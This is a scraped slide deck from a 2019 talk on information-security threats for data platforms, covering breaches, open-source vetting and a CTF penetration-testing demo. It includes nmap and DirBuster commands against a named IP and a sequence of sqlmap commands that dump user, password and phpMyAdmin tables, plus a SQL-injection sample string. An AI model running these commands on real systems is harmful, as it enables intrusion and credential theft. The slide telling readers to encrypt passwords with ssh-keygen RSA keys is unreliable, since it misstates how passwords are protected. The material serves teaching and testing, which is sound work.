Demystify Information Security & Threats for Data-Driven Platforms
Chetan Khatri
Solution Architect - Data & ML.
Accionlabs Inc.
18th Oct, 2019
Who Am I?
Professional Career:
● 2016 - Present. - Technical Lead / Solution Architect - Data & ML.
● 2015 - 2016 - Principal Big Data Engineer, Lead - Data Science Practice.
● 2014 - 2016 - Developer - Data Platforms.
● 2012 - 2014 - Consultant - Product developments.
University: Master of Computer Science.
Data Warehousing, Data Mining, Information Security / Cryptography, Reverse
Engineering, Information Retrieval.
Agenda
● Motivation
● Information Security - Ethics.
● Encryption
● Authentication
● Information Security & Potential threats with Open Source World.
● Find vulnerabilities.
● Checklist before using any Open Source library.
● Vulnerabilities report.
● Penetration Testing for Data Driven Developments.
Information Security - Motivation
Why is information security important?
Source: https://www.huffingtonpost.in/2018/07/06/hackers-have-accessed-email-ids-phone-numbers-of-over-5-million-yatra-users_a_23475885/
Source: https://techcrunch.com/2019/01/30/state-bank-india-data-leak/
Source: https://economictimes.indiatimes.com/small-biz/security-tech/security/zomato-hacked-security-breach-results-in-17-million-user-data-stolen/articleshow/58729251.cms
Source: https://www.forbes.com/sites/zakdoffman/2019/07/09/warning-as-millions-of-zoom-users-risk-webcam-hijack-change-your-settings-now/#281cb40642d9
Source: https://www.zdnet.com/article/another-data-leak-hits-india-aadhaar-biometric-database/
Information Security - Ethics.
● Information Storage - What, Which form, Access to whom?
● Information Usage - Where, How, Which form?
● Responsibility - Ownership, usage?
● Confidentiality
● Authentication
● Governance - Regulators, Guidelines, Damage?
● Freedom vs Force
● Damage to the Society.
● Impact on humanity.
● Data Breach and Cost.
Freedom vs Force
Source: https://en.wikipedia.org/wiki/Facebook%E2%80%93Cambridge_Analytica_data_scandal
Source: https://www.cnbc.com/2018/04/10/facebook-cambridge-analytica-a-timeline-of-the-data-hijacking-scandal.html
Source: https://www.engadget.com/2019/07/24/facebook-will-pay-5-billion-fine-for-cambridge-analytica-data-b/
Data Monetization against ethics
Source: https://techcrunch.com/2019/03/22/facebook-staff-raised-concerns-about-cambridge-analytica-in-september-2015-per-court-filing/
Source: https://www.theguardian.com/news/2018/mar/17/cambridge-analytica-facebook-influence-us-election
Encryption
How many people have seen a password stored in plain text in a database?
80%??
90%??
Yes, Sad but True.
Source: https://www.digitaltrends.com/news/equifax-data-breach-class-action-lawsuit-hack-password/
Never ever store an application's passwords in plain text.
Encrypt it. Use Asymmetric Key Encryption
If RSA, use ssh-keygen -t rsa -b 4096
Authentication
Open IP
Open Ports
Default Username and Password for Database, Services etc.
Chmod 777 for all directories, files ! Lol ;p
Information Security & Potential threats with Open Source World.
How many of you use Open Source?
Security for Open Source world
How well do you know what is inside your project?
Known Good Development practices.
Community Supported Open Source Code.
v/s
Random Code found on the Internet.
Vulnerability in Open Source
Source: https://synopsys.com/content/dam/synopsys/sig-assets/reports/2018-ossra.pdf
How Do I Choose GOOD Open Source
How do I choose SECURE open source packages?
Have a look
First look
Key questions for a first look?
● Have you read the README.md or any other readily accessible introductory information?
● Does the code seem to be held to good software development standards?
● Is this code developed for professional purposes or as a hobby project?
● Are there any signs of known issues in the code?
● Does this code only solve one use case, or is it robust enough for other use cases?
● Is this code active, or is it archived or "abandoned"?
Look for warning signs...
Warning Signs
Even an author says - to use something else!
Source: https://code.google.com/archive/p/crypto-js/
Built by an unauthorized person
Source: https://metacpan.org/release/Tivoli-AccessManager-Admin
I did not write this code, but I like it.
Source: https://github.com/kbranigan/cJSON
Not maintained anymore … Archived!
Source: https://code.google.com/archive/p/crypto-js/
Dumbest library - An author!
Source: https://github.com/kbranigan/cJSON/commit/730209a718cc9bada631cea136d13017752720f5
It is slower and more subjective to side-channel attacks by nature.
Source: http://www.literatecode.com/aes256
What to watch before using any package/library?
Key Questions for each Open Source Library
Do only 1-2 collaborators exist? Then the chances of unreviewed, harmful code are higher.
Is code merged to the master branch reviewed through a PR?
How many issues are OPEN?
Validate that OPEN issues are being addressed.
Is the code maintained or abandoned?
Are issues getting fixed and released promptly?
Check recently active committers and commits, to understand how old the project is.
Check how they handle vulnerabilities and security.
How can you report security vulnerabilities?
Check open security bugs/issues.
Good example: Apache Community.
https://www.apache.org/security/
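The key questions above, turned into a repeatable check (an added example, not code from the talk). The `RepoFacts` field names, the thresholds and both sample projects are assumptions constructed for illustration; fill the facts in by hand or from your hosting platform.

```python
from dataclasses import dataclass
from datetime import date
from typing import List, Tuple


@dataclass
class RepoFacts:
    """Facts about one library (hypothetical field names, collected by the reviewer)."""
    name: str
    collaborators: int          # people with commit access
    archived: bool              # project marked archived / read-only
    last_commit: date
    last_release: date
    open_issues: int
    issues_closed_90d: int      # issues closed in the last 90 days
    commits_merged_90d: int     # commits that reached the master branch
    commits_reviewed_90d: int   # of those, how many came through a reviewed PR
    has_security_policy: bool   # documented way to report vulnerabilities
    open_security_issues: int


# Thresholds are assumptions for this example; tune them to your own policy.
STALE_AFTER_DAYS = 365
MIN_REVIEW_RATIO = 0.8


def review(repo: RepoFacts, today: date) -> List[Tuple[str, str]]:
    """Return (check, finding) pairs; an empty list means no warning sign was raised."""
    findings = []

    if repo.collaborators <= 2:
        findings.append(("collaborators",
                         f"only {repo.collaborators} collaborator(s), code may go unreviewed"))

    if repo.commits_merged_90d == 0:
        findings.append(("review", "no merges in 90 days, review practice cannot be judged"))
    else:
        ratio = repo.commits_reviewed_90d / repo.commits_merged_90d
        if ratio < MIN_REVIEW_RATIO:
            findings.append(("review", f"only {ratio:.0%} of merged commits had a reviewed PR"))

    if repo.archived:
        findings.append(("maintenance", "project is archived"))
    elif (today - repo.last_commit).days > STALE_AFTER_DAYS:
        findings.append(("maintenance",
                         f"no commit for {(today - repo.last_commit).days} days"))

    # Open issues matter most when nobody is closing them.
    if repo.open_issues and repo.issues_closed_90d == 0:
        findings.append(("issues",
                         f"{repo.open_issues} open issues and none closed in 90 days"))

    if (today - repo.last_release).days > STALE_AFTER_DAYS:
        findings.append(("releases", "fixes are not being released promptly"))

    if not repo.has_security_policy:
        findings.append(("reporting", "no documented way to report a vulnerability"))

    if repo.open_security_issues:
        findings.append(("security_issues",
                         f"{repo.open_security_issues} security issue(s) still open"))

    return findings


# Constructed sample data: one well-run project and one abandoned one.
TODAY = date(2019, 10, 18)
HEALTHY = RepoFacts("well-run-lib", 14, False, date(2019, 10, 10), date(2019, 9, 1),
                    40, 35, 120, 118, True, 0)
ABANDONED = RepoFacts("random-snippet", 1, True, date(2016, 3, 1), date(2015, 12, 1),
                      25, 0, 0, 0, False, 2)

if __name__ == "__main__":
    for repo in (HEALTHY, ABANDONED):
        print(repo.name)
        for check, finding in review(repo, TODAY) or [("ok", "no warning signs")]:
            print(f"  [{check}] {finding}")
```

An empty result only means none of these questions raised a flag; it does not mean the library has no vulnerabilities.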
Reporting A Vulnerability
Vulnerability Handling
No known vulnerabilities doesn’t mean SECURITY!
1101 new vulnerabilities reported only in Oct, 2019.
Source: https://nvd.nist.gov/vuln/full-listing/2019/10
Vulnerabilities report
we are going far worse!
Source: https://www.cvedetails.com/browse-by-date.php
Penetration Testing {Network, Database}
Check number of OPEN services and ports
sudo nmap -p- -sS -A IP-Address
Server Files / Directories Scan on permission and Access
java -jar DirBuster-0.12.jar -H -u http://167.71.224.201:1337
httrack website copier
Subgraph Vega
● Vega is a free and open source web security scanner and web security testing platform to test the security of web applications.
● SQL Injection
● XSS
● Inadvertently disclosed sensitive information
● Reflected cross-site scripting
● Stored cross-site scripting
● Blind SQL injection
● Remote file include
● Shell injection
● TLS / SSL security settings
Setup Proxy for Vega Tool
Vega - Start the proxy!
Vega - Start scanning Web application
Security Scanning alert summary
Web Application - Tracing web request payload at Proxy
Web Application - Intercepting the response callback at Proxy
SqlMap - A penetration testing tool for exploiting SQL injection flaws and a lot more!
● Database fingerprinting.
● Full support for SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
● Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
● Dump database tables entirely.
● Out-of-the-box search support for database names, table names, column names and values.
● Support to execute arbitrary commands and retrieve their standard output.
● Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server.
Demo - Penetration testing a Web Application using SQLMap
SQLMap - Commands
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf --tables
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf --tables user_profile
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf --tables
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T user_profile --columns
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T user_profile -C Email, Mobile, Name --dump
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T ctf --columns
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag --columns
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag -C Flag1
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag --columns
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag -C Flag1
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag -C Flag1 --dump
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql --tables
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T users --columns
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user --columns
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user -C User, Password
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user -C User, Password
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user -C User, Password --dump
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test --columns
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test --tables
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin --tables
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin -T pma__users --columns
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin -T pma__users --columns --dump
https://gist.github.com/chetkhatri/45b76d3f2d1da1d798d86a8709f33ac5
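Why the "email" parameter in the demo was injectable, and the fix, as an added example that is not code from the talk or the CTF application. The table and column names follow the commands above; sqlite3 stands in for MySQL so the block runs offline, and the rows and inputs are constructed.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the demo's user_profile table (constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user_profile (Email TEXT, Mobile TEXT, Name TEXT)")
    conn.executemany(
        "INSERT INTO user_profile VALUES (?, ?, ?)",
        [
            ("alice@example.com", "555-0100", "Alice"),
            ("bob@example.com", "555-0101", "Bob"),
            ("o'brien@example.com", "555-0102", "Dara"),
        ],
    )
    return conn


def lookup_vulnerable(conn, email):
    """BEFORE: the request value is pasted into the SQL text, so it can change the query."""
    query = "SELECT Name FROM user_profile WHERE Email = '" + email + "' ORDER BY Name"
    return [row[0] for row in conn.execute(query)]


def lookup_parameterized(conn, email):
    """AFTER: the value travels separately from the SQL text and is only ever data."""
    query = "SELECT Name FROM user_profile WHERE Email = ? ORDER BY Name"
    return [row[0] for row in conn.execute(query, (email,))]


# Constructed inputs: a normal address, a legitimate address containing a quote,
# and a value that closes the string literal and adds its own condition.
NORMAL = "bob@example.com"
QUOTED = "o'brien@example.com"
CRAFTED = "nobody@example.com' OR '1'='1"


def compare(conn, email):
    """Run both lookups on the same input and report what each one did."""
    try:
        before = lookup_vulnerable(conn, email)
    except sqlite3.OperationalError as exc:
        before = f"SQL error: {exc}"   # the input broke the statement's syntax
    return {"vulnerable": before, "parameterized": lookup_parameterized(conn, email)}


if __name__ == "__main__":
    db = make_db()
    for value in (NORMAL, QUOTED, CRAFTED):
        print(repr(value), compare(db, value))
```

With a MySQL driver the placeholder is `%s` instead of `?`; the rule is the same, never build the statement by string concatenation.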
Questions?
Hope you had fun!
Thank you!
Chetan Khatri, chetan.khatri@live.com
@khatri_chetan - https://twitter.com/khatri_chetan
https://github.com/chetkhatri
PyConLT19-No_more_struggles_with_Apache_Spark_(PySpark)_workloads_in_production
Chetan Khatri
 
Automate ml workflow_transmogrif_ai-_chetan_khatri_berlin-scala
Automate ml workflow_transmogrif_ai-_chetan_khatri_berlin-scalaAutomate ml workflow_transmogrif_ai-_chetan_khatri_berlin-scala
Automate ml workflow_transmogrif_ai-_chetan_khatri_berlin-scala
Chetan Khatri
 
HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...
HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...
HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...
Chetan Khatri
 
TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...
TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...
TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...
Chetan Khatri
 
An Introduction to Spark with Scala
An Introduction to Spark with ScalaAn Introduction to Spark with Scala
An Introduction to Spark with Scala
Chetan Khatri
 
HBase with Apache Spark POC Demo
HBase with Apache Spark POC DemoHBase with Apache Spark POC Demo
HBase with Apache Spark POC Demo
Chetan Khatri
 
HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...
HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...
HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...
Chetan Khatri
 
HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...
HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...
HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...
Chetan Khatri
 
Fossasia 2018-chetan-khatri
Fossasia 2018-chetan-khatriFossasia 2018-chetan-khatri
Fossasia 2018-chetan-khatri
Chetan Khatri
 
Fossasia ai-ml technologies and application for product development-chetan kh...
Fossasia ai-ml technologies and application for product development-chetan kh...Fossasia ai-ml technologies and application for product development-chetan kh...
Fossasia ai-ml technologies and application for product development-chetan kh...
Chetan Khatri
 
An Introduction Linear Algebra for Neural Networks and Deep learning
An Introduction Linear Algebra for Neural Networks and Deep learningAn Introduction Linear Algebra for Neural Networks and Deep learning
An Introduction Linear Algebra for Neural Networks and Deep learning
Chetan Khatri
 
Introduction to Computer Science
Introduction to Computer ScienceIntroduction to Computer Science
Introduction to Computer Science
Chetan Khatri
 
An introduction to Git with Atlassian Suite
An introduction to Git with Atlassian SuiteAn introduction to Git with Atlassian Suite
An introduction to Git with Atlassian Suite
Chetan Khatri
 
Think machine-learning-with-scikit-learn-chetan
Think machine-learning-with-scikit-learn-chetanThink machine-learning-with-scikit-learn-chetan
Think machine-learning-with-scikit-learn-chetan
Chetan Khatri
 
A step towards machine learning at accionlabs
A step towards machine learning at accionlabsA step towards machine learning at accionlabs
A step towards machine learning at accionlabs
Chetan Khatri
 
Voltage measurement using arduino
Voltage measurement using arduinoVoltage measurement using arduino
Voltage measurement using arduino
Chetan Khatri
 
Design & Building Smart Energy Meter
Design & Building Smart Energy MeterDesign & Building Smart Energy Meter
Design & Building Smart Energy Meter
Chetan Khatri
 
Ad

Recently uploaded (20)

Technology Trends in 2025: AI and Big Data Analytics
Technology Trends in 2025: AI and Big Data AnalyticsTechnology Trends in 2025: AI and Big Data Analytics
Technology Trends in 2025: AI and Big Data Analytics
InData Labs
 
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
Alan Dix
 
Generative Artificial Intelligence (GenAI) in Business
Generative Artificial Intelligence (GenAI) in BusinessGenerative Artificial Intelligence (GenAI) in Business
Generative Artificial Intelligence (GenAI) in Business
Dr. Tathagat Varma
 
Increasing Retail Store Efficiency How can Planograms Save Time and Money.pptx
Increasing Retail Store Efficiency How can Planograms Save Time and Money.pptxIncreasing Retail Store Efficiency How can Planograms Save Time and Money.pptx
Increasing Retail Store Efficiency How can Planograms Save Time and Money.pptx
Anoop Ashok
 
AI and Data Privacy in 2025: Global Trends
AI and Data Privacy in 2025: Global TrendsAI and Data Privacy in 2025: Global Trends
AI and Data Privacy in 2025: Global Trends
InData Labs
 
Role of Data Annotation Services in AI-Powered Manufacturing
Role of Data Annotation Services in AI-Powered ManufacturingRole of Data Annotation Services in AI-Powered Manufacturing
Role of Data Annotation Services in AI-Powered Manufacturing
Andrew Leo
 
TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...
TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...
TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...
TrustArc
 
Complete Guide to Advanced Logistics Management Software in Riyadh.pdf
Complete Guide to Advanced Logistics Management Software in Riyadh.pdfComplete Guide to Advanced Logistics Management Software in Riyadh.pdf
Complete Guide to Advanced Logistics Management Software in Riyadh.pdf
Software Company
 
2025-05-Q4-2024-Investor-Presentation.pptx
2025-05-Q4-2024-Investor-Presentation.pptx2025-05-Q4-2024-Investor-Presentation.pptx
2025-05-Q4-2024-Investor-Presentation.pptx
Samuele Fogagnolo
 
Electronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploitElectronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploit
niftliyevhuseyn
 
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In France
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In FranceManifest Pre-Seed Update | A Humanoid OEM Deeptech In France
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In France
chb3
 
Cyber Awareness overview for 2025 month of security
Cyber Awareness overview for 2025 month of securityCyber Awareness overview for 2025 month of security
Cyber Awareness overview for 2025 month of security
riccardosl1
 
Quantum Computing Quick Research Guide by Arthur Morgan
Quantum Computing Quick Research Guide by Arthur MorganQuantum Computing Quick Research Guide by Arthur Morgan
Quantum Computing Quick Research Guide by Arthur Morgan
Arthur Morgan
 
AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...
AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...
AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...
SOFTTECHHUB
 
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager APIUiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPathCommunity
 
tecnologias de las primeras civilizaciones.pdf
tecnologias de las primeras civilizaciones.pdftecnologias de las primeras civilizaciones.pdf
tecnologias de las primeras civilizaciones.pdf
fjgm517
 
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
BookNet Canada
 
Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...
Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...
Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...
Aqusag Technologies
 
Build Your Own Copilot & Agents For Devs
Build Your Own Copilot & Agents For DevsBuild Your Own Copilot & Agents For Devs
Build Your Own Copilot & Agents For Devs
Brian McKeiver
 
The Evolution of Meme Coins A New Era for Digital Currency ppt.pdf
The Evolution of Meme Coins A New Era for Digital Currency ppt.pdfThe Evolution of Meme Coins A New Era for Digital Currency ppt.pdf
The Evolution of Meme Coins A New Era for Digital Currency ppt.pdf
Abi john
 
Technology Trends in 2025: AI and Big Data Analytics
Technology Trends in 2025: AI and Big Data AnalyticsTechnology Trends in 2025: AI and Big Data Analytics
Technology Trends in 2025: AI and Big Data Analytics
InData Labs
 
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
Alan Dix
 
Generative Artificial Intelligence (GenAI) in Business
Generative Artificial Intelligence (GenAI) in BusinessGenerative Artificial Intelligence (GenAI) in Business
Generative Artificial Intelligence (GenAI) in Business
Dr. Tathagat Varma
 
Increasing Retail Store Efficiency How can Planograms Save Time and Money.pptx
Increasing Retail Store Efficiency How can Planograms Save Time and Money.pptxIncreasing Retail Store Efficiency How can Planograms Save Time and Money.pptx
Increasing Retail Store Efficiency How can Planograms Save Time and Money.pptx
Anoop Ashok
 
AI and Data Privacy in 2025: Global Trends
AI and Data Privacy in 2025: Global TrendsAI and Data Privacy in 2025: Global Trends
AI and Data Privacy in 2025: Global Trends
InData Labs
 
Role of Data Annotation Services in AI-Powered Manufacturing
Role of Data Annotation Services in AI-Powered ManufacturingRole of Data Annotation Services in AI-Powered Manufacturing
Role of Data Annotation Services in AI-Powered Manufacturing
Andrew Leo
 
TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...
TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...
TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...
TrustArc
 
Complete Guide to Advanced Logistics Management Software in Riyadh.pdf
Complete Guide to Advanced Logistics Management Software in Riyadh.pdfComplete Guide to Advanced Logistics Management Software in Riyadh.pdf
Complete Guide to Advanced Logistics Management Software in Riyadh.pdf
Software Company
 
2025-05-Q4-2024-Investor-Presentation.pptx
2025-05-Q4-2024-Investor-Presentation.pptx2025-05-Q4-2024-Investor-Presentation.pptx
2025-05-Q4-2024-Investor-Presentation.pptx
Samuele Fogagnolo
 
Electronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploitElectronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploit
niftliyevhuseyn
 
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In France
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In FranceManifest Pre-Seed Update | A Humanoid OEM Deeptech In France
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In France
chb3
 
Cyber Awareness overview for 2025 month of security
Cyber Awareness overview for 2025 month of securityCyber Awareness overview for 2025 month of security
Cyber Awareness overview for 2025 month of security
riccardosl1
 
Quantum Computing Quick Research Guide by Arthur Morgan
Quantum Computing Quick Research Guide by Arthur MorganQuantum Computing Quick Research Guide by Arthur Morgan
Quantum Computing Quick Research Guide by Arthur Morgan
Arthur Morgan
 
AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...
AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...
AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...
SOFTTECHHUB
 
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager APIUiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPathCommunity
 
tecnologias de las primeras civilizaciones.pdf
tecnologias de las primeras civilizaciones.pdftecnologias de las primeras civilizaciones.pdf
tecnologias de las primeras civilizaciones.pdf
fjgm517
 
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
BookNet Canada
 
Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...
Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...
Massive Power Outage Hits Spain, Portugal, and France: Causes, Impact, and On...
Aqusag Technologies
 
Build Your Own Copilot & Agents For Devs
Build Your Own Copilot & Agents For DevsBuild Your Own Copilot & Agents For Devs
Build Your Own Copilot & Agents For Devs
Brian McKeiver
 
The Evolution of Meme Coins A New Era for Digital Currency ppt.pdf
The Evolution of Meme Coins A New Era for Digital Currency ppt.pdfThe Evolution of Meme Coins A New Era for Digital Currency ppt.pdf
The Evolution of Meme Coins A New Era for Digital Currency ppt.pdf
Abi john
 

Demystify Information Security & Threats for Data-Driven Platforms With Chetan Khatri

  • 1. Demystify Information Security & Threats for Data-Driven Platforms Chetan Khatri Solution Architect - Data & ML. Accionlabs Inc. 18th Oct, 2019
  • 2. Who Am I? Professional Career: ● 2016 - Present. - Technical Lead / Solution Architect - Data & ML. ● 2015 - 2016 - Principal Big Data Engineer, Lead - Data Science Practice. ● 2014 - 2016 - Developer - Data Platforms. ● 2012 - 2014 - Consultant - Product developments. University: Master of Computer Science. Data Warehousing, Data Mining, Information Security / Cryptography, Reverse Engineering, Information Retrieval.
  • 3. Agenda ● Motivation ● Information Security - Ethics. ● Encryption ● Authentication ● Information Security & Potential threats with Open Source World. ● Find vulnerabilities. ● Checklist before using any Open Source library. ● Vulnerabilities report. ● Penetration Testing for Data Driven Developments.
  • 4. Information Security - Motivation Why is Information Security important?
  • 5. Information Security - Motivation Source: https://www.huffingtonpost.in/2018/07/06/hackers-have-accessed-email-ids-phone-numbers-of-over-5-million-yatra-users_a_23475885/
  • 6. Information Security - Motivation Source: https://techcrunch.com/2019/01/30/state-bank-india-data-leak/
  • 7. Information Security - Motivation Source: https://techcrunch.com/2019/01/30/state-bank-india-data-leak/
  • 8. Information Security - Motivation Source: https://economictimes.indiatimes.com/small-biz/security-tech/security/zomato-hacked-security-breach-results-in-17-million-user-data-stolen/articleshow/58729251.cms
  • 9. Information Security - Motivation Source: https://www.forbes.com/sites/zakdoffman/2019/07/09/warning-as-millions-of-zoom-users-risk-webcam-hijack-change-your-settings-now/#281cb40642d9
  • 14. Information Security - Ethics. ● Information Storage - What, Which form, Access to whom? ● Information Usage - Where, How, Which form? ● Responsibility - Ownership, usage? ● Confidentiality ● Authentication ● Governance - Regulators, Guidelines, Damage? ● Freedom vs Force ● Damage to the Society. ● Impact on humanity. ● Data Breach and Cost.
  • 18. Data Monetization against ethics Source: https://techcrunch.com/2019/03/22/facebook-staff-raised-concerns-about-cambridge-analytica-in-september-2015-per-court-filing/ Source: https://www.theguardian.com/news/2018/mar/17/cambridge-analytica-facebook-influence-us-election
  • 19. Encryption How many people have seen passwords stored in plain text in a database? 80%?? 90%?? Yes, sad but true. Source: https://www.digitaltrends.com/news/equifax-data-breach-class-action-lawsuit-hack-password/
  • 20. Encryption How many people have seen passwords stored in plain text in a database? 80%?? 90%?? Yes, sad but true. Never ever store an application's passwords in plain text. Encrypt them. Use asymmetric key encryption. If RSA, use ssh-keygen -t rsa -b 4096
  • 21. Authentication ● Open IP ● Open ports ● Default username and password for databases, services, etc. ● chmod 777 for all directories and files! Lol ;p
  • 22. Information Security & Potential threats with Open Source World.
  • 23. Information Security & Potential threats with Open Source World. How many of you use Open Source ?
  • 24. Security for Open Source world How well do you know what is inside your project?
  • 25. Security for Open Source world Known Good Development practices. Community Supported Open Source Code. v/s Random Code found on the Internet.
  • 26. Vulnerability in Open Source Source: https://synopsys.com/content/dam/synopsys/sig-assets/reports/2018-ossra.pdf
  • 27. How Do I Choose GOOD Open Source
  • 28. How do I choose SECURE open source packages?
  • 29. How do I choose SECURE open source packages? Have a look First look
  • 30. Key questions for a first look ● Have you read the README.md or any other readily accessible introductory information? ● Does the code seem to follow good software development standards? ● Was this code developed for professional purposes or as a hobby project? ● Are there any signs of known issues in the code? ● Does this code solve only one use case, or is it robust enough for other use cases? ● Is this code active, or is it archived / “abandoned”? Look for warning signs...
  • 32. Even an author says - to use something else! Source: https://code.google.com/archive/p/crypto-js/
  • 33. Built by an unauthorized person Source: https://metacpan.org/release/Tivoli-AccessManager-Admin
  • 34. I did not write this code, but I like it. Source: https://github.com/kbranigan/cJSON
  • 35. Not maintained anymore … Archived! Source: https://code.google.com/archive/p/crypto-js/
  • 36. Dumbest library - An author! Source: https://github.com/kbranigan/cJSON/commit/730209a718cc9bada631cea136d13017752720f5
  • 37. It is slower and more subjective to side-channel attacks by nature. Source: http://www.literatecode.com/aes256
  • 38. What to watch before using any package/library?
